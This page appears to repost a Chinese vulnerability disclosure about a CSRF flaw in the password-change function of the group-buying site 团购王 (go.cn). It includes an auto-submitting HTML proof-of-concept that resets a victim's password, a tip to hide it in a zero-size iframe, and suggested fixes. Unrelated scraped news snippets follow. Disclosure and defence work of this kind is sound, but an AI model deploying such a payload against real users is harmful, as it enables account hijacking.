团购王csrf可劫持用户修改密码

   修改密码处无验证token,并且无验证原密码(一个涉及money的站,修改密码居然没有验证原密码!!!),可以通过一个精心构造的表单欺骗用户修改密码。

<html>
 
<body>
 
<form name="csrf" action="http://www.go.cn/index.php?m=settings" method="POST">
 
<input type=text name=password value="woooooooyun"></input>
<input type=text name=password2 value="woooooooyun"></input>
<input type=text name=do value="update"></input>
<input type="submit" value="submit" />
 
</form>
 
<script>
 
 document.csrf.submit();
 
</script>
 
</body>
 
</html>

  欺骗用户访问后,密码会被改成woooooooyun。


  直接让用户访问太明显了,直接会跳转到“修改成功”的页面,所以可以准备一个看似正常的页面(如新闻),然后iframe这个POC,并且height=0,width=0,用户就会在不知情的情况下被修改密码,后果可想而知了。

  修复方案:

  1.修改密码一定要验证原密码

  2.所有涉及用户信息的操作要验证随机的token.

时间: 2025-01-02 01:58:19

团购王csrf可劫持用户修改密码的相关文章

团购王上周完成了上线以来的首次改版

根据2012年清明节放假安排,4月2号到5号为法定假日.清明节正值春暖花开时,人们习惯在这个时候出去踏踏青. 为了满足消费者的刚性需求,知名团购网站团购王(go.cn)36个城市分站同步推出了超过100单旅游团购商品,其中北京.香港.上海.深圳.武汉.苏州等旅游城市的团购活动较多. 据了解,团购王上周完成了上线以来的首次改版,酒店旅游频道分拆出"酒店团购"和"旅游团购"两个板块,"让酒店的归酒店,旅游的归旅游,用户寻找团购信息将更有针对性."团购

清明小长假将至 团购王推百个旅游团购

根据2012年清明节http://www.aliyun.com/zixun/aggregation/9774.html">放假安排,4月2号到5号为法定假日.清明节正值春暖花开时,人们习惯在这个时候出去踏踏青. 为了满足消费者的刚性需求,知名团购网站团购王(go.cn)36个城市分站同步推出了超过100单旅游团购商品,其中北京.香港.上海.深圳.武汉.苏州等旅游城市的团购活动较多. 据了解,团购王上周完成了上线以来的首次改版,酒店旅游频道分拆出"酒店团购"和"

团购王太原站上线 全国分站数量增至302个

团购王0元团购苹果四件套 近日,知名团购网站团购王太原站(http://www.go.cn/taiyuan)正式上线,团购王全国分站数量达302个,成为分站数量最多的团购网站之一. 团购王太原站上线后,推出了本地精品团购51项,包括演出.摄影.酒店等,另外还有服饰.美妆.零食.家居.数码等1100多个团购商品. 2012年以来,团购行业遭遇了史上最冷的寒潮,团购网站 纷纷倒闭,第三方数据统计,目前已有1968家团购网站推出市场. 与其他网站倒闭或撤站不同,团购王未受大环境的影响而中止异地扩张战略

团购网频频卖假货团购王称继续坚持正品承诺

最近一段时间以来,多家知名团购网站被媒体 曝光出售 假货,这一消息在团购业内引起轩然大波,不仅令团购消费者信心触礁,也重创原本就十分脆弱的团购信誉.知名团购网站"团购王"CEO王鹏表示,团购行业频频出现负面事件,终究会拖垮行业的声誉,殃及无辜. 昨日广州媒体刊出报道称,国内6个知名化妆品团购都在出售假冒伪劣产品,在随机抽查的7件商品中仅1件验为合格,引发业界轩然大波.报道称,这些卖假货的网站无一不在网站宣誓: 100%正品.假一赔三.支持专柜验货:网页下方还附有正品保障.团购诚信企业.

selfserverpassword-使用过Self service password来修改LDAP用户修改密码

问题描述 使用过Self service password来修改LDAP用户修改密码 因为现在统一用LDAP 做身份统一认证管理,所以现在想做到每个用户能自己自行的修改密码,在baidugoogle很多,可是解决这个根本的原因我查了又查,可是还是有点小问题. 问题贴出来了,求解决啊. 安装的步骤:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 安装 Self service password@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

路透社:eBay遭黑客攻击 督促1.45亿用户修改密码

据路透社报道,eBay周三表示,3个月前对其发动的http://www.aliyun.com/zixun/aggregation/10370.html">网络攻击已经威胁到客户的数据安全,该公司督促1.45亿用户修改密码.今年2月底至3月初,eBay遭到神秘黑客的攻击,用户的电邮地址.密码.生日和其他信息被盗. eBay的女发言人称,很多帐号可能处于危险中,但拒绝透露这些帐号具体有多少.该公司表示,没有证据显示有人在未经授权情况下访问了PayPal支付公司的金融或信用卡信息,因为这些信息是

云笔记Evernote遭攻击 要求5000万用户修改密码

据国外媒体报道,发现系统遭到黑客入侵后,云笔记服务厂商Evernote强制要求全部5000万用户修改密码.498)this.w idth=498;' onmousewheel = 'javascript:return big(this)' class="flag_bigP" alt="" align="middle" src="http://images.51cto.com/files/uploadimg/20130304/102642

WordPress禁止特定用户修改密码方法

方法很简单,去掉这个公共帐号修改密码的权限即可,我们可以在主题目录下的functions.php中添加以下代码:  代码如下 复制代码 $disable_ids = array( 2 ); // 禁止修改密码的用户id global $current_user; get_currentuserinfo(); if ( in_array( $current_user->ID, $disable_ids ) ) {   // 后台个人资料页,隐藏密码输入框   add_filter('show_pa

eBay 遭黑客攻击 督促 1.45 亿用户修改密码

5月22日消息,据路透社报道,eBay周三表示,3个月前对其发动的网络攻击已经威胁到客户的数据安全,该公司督促1.45亿用户修改密码.今年2月底至3月初,eBay遭到神秘黑客的攻击,用户的电邮地址.密码.生日和其他信息被盗. eBay的女发言人称,很多帐号可能处于危险中,但拒绝透露这些帐号具体有多少.该公司表示,没有证据显示有人在未经授权情况下访问了PayPal支付公司的金融或信用卡信息,因为这些信息是另外加密存储的.周三下午,eBay股价跌0.2%. 网 络安全专家建议,eBay客户应对欺诈保